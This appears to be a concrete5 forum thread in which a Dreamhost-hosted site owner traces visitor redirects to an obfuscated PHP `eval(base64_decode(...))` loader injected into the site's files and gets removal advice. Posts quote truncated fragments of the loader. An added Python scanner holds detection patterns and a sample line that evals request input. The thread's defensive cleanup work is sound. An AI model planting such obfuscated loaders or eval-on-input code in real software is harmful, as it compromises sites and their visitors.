Visitor forwarded to commercial websites

Hey Guys!

I'm new to Concrete5 and web design, so thanks for the help!

I was just informed that a visitor to our site (www.justifi.org) was forwarded sporadically to commercial sites from our domain as she was browsing. Is it possible that our website was compromised or hacked, or is this likely a virus on her end? Is there a way to check? How can I be sure that our site is not redirecting visitors to advertising sites, etc.?

Thank you very much for the help, please feel free to contact me directly at Steve@justifi.org if you have input or recommendations, too.

Best regards,

Steve

adajad replied on at Permalink Reply
Most likely this is something on the client side and not on your site.

That being said, I read in the thread below that Dreamhost had an attack a while back so if you use Dreamhost you should investigate further:
http://www.concrete5.org/community/forums/customizing_c5/hackedinfe...

EDIT: I have gone to your site several times and not once been redirected.
Justifi replied on at Permalink Reply
Thank you very much for the quick reply, good to know, thank you. We do use dreamhost and I'll contact them about the problem, and check my computer for viruses.

If there is an "injection script" etc., then what would I do to resolve that? Does Dreamhost take care of that, or do I need to do something?

Thanks, I know these are simple questions, really appreciate it.

Steve
adajad replied on at Permalink Best Answer Reply
Since Dreamhost is well aware of this issue, I think you should contact them and ask for how to find out if you are infected somehow. They should have a known fix to the issue IF it's in their environment. It might still be on the client side, though (since I didn't get redirected).
Justifi replied on at Permalink Reply
I'm actually now getting replies from other people, and found in a Wordpress forum something similar. It looks like people are forwarded to this address... What do we need to do about this?

http://ustreamtvonline.rr.nu/3f/...

Steve
adajad replied on at Permalink Reply
I would contact the hosting service immediately and also put some information up on your home page addressing this issue so all visitors are aware of it not being something done by you, but as being a problem with the hosting service.

I don't know if you can actually see if something has been added to your php files, but it is worth having a look. Look for suspicious script tags. The discussion here is kind of informative and contains some pointers as to where to look and what you may find: http://webmasters.stackexchange.com/questions/26475/is-someone-hija...
Justifi replied on at Permalink Reply
Thank you, really, very helpful advice. We've posted a message and contacted dreamhost, they're looking at it and we hope to hear back soon. Thanks for the help, and I'll be happy to share what they say if it helps others.

I looked online for ways to scan php code for viruses/injected scripts, but I think dreamhost is probably better equipped to handle this?

Steve
adajad replied on at Permalink Reply
Dreamhost should be able to come up with a qualified answer, and please do post back here if/when you resolve this so others being victims of the same can find information.
Justifi replied on at Permalink Reply
Still waiting from them, but I looked at a bunch of the PHP files and found a lot of code like this in my index, home, full, etc.php files.

<?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJF9TRVJWRVJbJ21................."));?><?php  
require('concrete/dispatcher.php');


I'm thinking this is the problem, yes?? I'll wait to see what DreamHost says, but I'll keep searching to figure this out.
adajad replied on at Permalink Reply
This is definitely the cause of your problem.
<?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJF9TRVJWRVJbJ21................."));?>


You need to remove that part from all your php files and also, when you have done that, change your admin password(s). You should also look in your 'users' table in the db to see if you have any users that shouldn't be there.

Also, look in the dispatcher.php and other php files usually included in pages.
Justifi replied on at Permalink Reply
This is great to know, thank you. Going to go through and delete the code.

Last question, I hope, is just how much of the code do I delete? This is the first few lines of the site, how much of this is malicious? (from the blog-index.php file)

<?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJF9TRVJWRVJbJ21yX25vJ10pKXsg...CkuIlxuIi4nJDEnLCRkZWNvZGVkX2NvbnRlbnQpOyAgfWVsc2V7ICByZXR1cm4gJGRlY29kZWRfY29udGVudC5nbWxfNzc3KCk7ICB9ICB9ICBvYl9zdGFydCgnbXJvYmgnKTsgIH0gIH0="));?><?php  
defined('C5_EXECUTE') or die("Access Denied.");
?>
<div id="blog-index">
  <?php   
  $isFirst = true; //So first item in list can have a different css class (e.g. no top border)
  $excerptBlocks = ($controller->truncateSummaries ? 1 : null); //1 is the number of blocks to include in the excerpt
  $truncateChars = ($controller->truncateSummaries ? $controller->truncateChars : 0);
  foreach ($cArray as $cobj):


After this, I think I can swing it on my own.
adajad replied on at Permalink Reply
This is what you need to remove:

<?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJF9TRVJWRVJbJ21yX25vJ10pKXsg...CkuIlxuIi4nJDEnLCRkZWNvZGVkX2NvbnRlbnQpOyAgfWVsc2V7ICByZXR1cm4gJGRlY29kZWRfY29udGVudC5nbWxfNzc3KCk7ICB9ICB9ICBvYl9zdGFydCgnbXJvYmgnKTsgIH0gIH0="));?>


basically everything before
<?php   defined('C5_EXECUTE') or die("Access Denied."); ?>
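Added example, not from this thread or from concrete5: a small Python scanner that does what adajad describes above for a whole site tree. It reports every .php file that starts with the prepended eval(base64_decode("...")) loader, strips exactly that prefix only when fix=True, and flags any other eval(base64_decode( it sees for manual review rather than editing it. The prefix pattern and the sample tree in demo() are assumptions built from the snippets posted in this thread, not the site's real files.

```python
import base64
import re
import tempfile
from pathlib import Path

# The injected loader sits before the file's real "<?php" tag: an opening tag, the
# "/**/" marker and one eval(base64_decode("...")) call closed by "?>". The pattern is
# an assumption generalised from the two samples posted in this thread.
INJECTED_PREFIX = re.compile(r'^<\?php\s*/\*\*/\s*eval\(base64_decode\("[A-Za-z0-9+/=]+"\)\);\s*\?>')
# Broader, report-only check for the same construct anywhere in a file.
SUSPICIOUS = re.compile(r'eval\s*\(\s*base64_decode\s*\(')


def strip_injection(source: str) -> tuple[str, bool]:
    """Return (cleaned_source, was_prefixed) for one file's contents."""
    m = INJECTED_PREFIX.match(source)
    return (source[m.end():], True) if m else (source, False)


def scan_tree(root: Path, fix: bool = False) -> dict[str, list[str]]:
    """Report .php files under root; rewrite the exact prefix in place only when fix=True."""
    report: dict[str, list[str]] = {"prefixed": [], "suspicious": []}
    for path in sorted(root.rglob("*.php")):
        text = path.read_text(encoding="utf-8", errors="surrogateescape")
        cleaned, prefixed = strip_injection(text)
        rel = path.relative_to(root).as_posix()
        if prefixed:
            report["prefixed"].append(rel)
            if fix:
                path.write_text(cleaned, encoding="utf-8", errors="surrogateescape")
        if SUSPICIOUS.search(cleaned):  # anything left after stripping is reported, never edited
            report["suspicious"].append(rel)
    return report


def demo() -> dict:
    """Constructed sample tree: one prefixed file, one clean file, one with a deeper eval."""
    payload = base64.b64encode(b"echo 'constructed sample';").decode()  # harmless stand-in
    bad = '<?php /**/ eval(base64_decode("%s"));?><?php  \nrequire(\'concrete/dispatcher.php\');\n' % payload
    good = '<?php\ndefined(\'C5_EXECUTE\') or die("Access Denied.");\n?>\n<div id="blog-index"></div>\n'
    deep = '<?php\n$x = 1;\neval(base64_decode($_GET["q"]));\n'
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "index.php").write_text(bad)
        (root / "blog-index.php").write_text(good)
        (root / "concrete").mkdir()
        (root / "concrete" / "helper.php").write_text(deep)
        before = scan_tree(root)           # dry run: nothing is rewritten
        scan_tree(root, fix=True)          # strip the exact prefix in place
        final = scan_tree(root)            # re-scan to confirm the prefix is gone
        fixed_text = (root / "index.php").read_text()
    return {"before": before, "final": final, "fixed_text": fixed_text}
```

Run scan_tree(Path("/path/to/site")) first without fix=True and back the tree up before rewriting; files listed under "suspicious" need a human look, since the scanner only removes the one exact prefix it recognises.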
AnnieZ replied on at Permalink Reply
OK - this is happening on my websites as well. Also Dreamhost. But I see this malicious code on almost every php page I have. I am not very savvy here. So do I have to open every php page and delete it? Is there a better way?

Thanks,
Annie
xaritas replied on at Permalink Reply
Yeah. One of my websites was just hit. They infected every single .php file in the site with that line of code.

Well, it was the one thing I did in Joomla! before I decided that platform was a joke, so no big loss, except my time.

I don't even use passwords, I use key based authentication, and they still pwned me. So obviously the attackers managed to root the machines and literally nothing is safe on your hosts. If you have sensitive data, nuke it.

Thanks to the fact that Concrete manages to avoid intermingling code, you can probably re-install concrete over the top of your existing installation and it will be good. However, it is a delicate operation, so take care if you are a novice.

Super excited right now.
xaritas replied on at Permalink Reply
Okay, I wrote up how to do this for every file in a separate post:

http://www.concrete5.org/community/forums/customizing_c5/if-your-dr...

You need to be comfortable with the shell. Let me know if you have any problems, I'll monitor that thread.
Justifi replied on at Permalink Reply
To be honest it looks like this is a little out of my league to address on my own, we're looking at commercial options for repairing it. I found Sucuri.net, which seemed reasonably priced and their representative said they could fix it for us. Does anyone have experience with this type of service, should we use them or is there another service we should use?
adajad replied on at Permalink Reply
I haven't tested xaritas' approach (since I'm not on dreamhost and I'm not infected) but it looks legit to me. You could ask nicely and perhaps xaritas may help you. If not then I could give it a try with the information xaritas has given.

You should be aware that you need to give out root login credentials for your dreamhost account.
Justifi replied on at Permalink Reply
Hey everyone!

Thanks again for all the help - I wanted to let you know that we were able to resolve the problem by contacting DreamHost with an email specifying the problem and their Security team was able to go in and clean the problem, free of charge. Took a few days, but we ran diagnostic tests at Sucuri.net and unmaskparasites.com and both came up clean after this, so we believe the problem has been solved.

Additionally, we had previously been unable to edit concrete5 on our Mac, and now realize that this was because we were hacked. So, now we're able to edit on the Mac, too, which answered another mystery for us.

Hopefully this is the end of the problem (we've changed passwords, too). Any pointers for how to prevent this from happening in the future?

And, thanks again for the offers to help, really truly appreciate it.
adajad replied on at Permalink Reply
I'm glad you could sort it out!
peleus replied on at Permalink Reply
By the way Justifi, did the support remotely login here or were you just given instructions?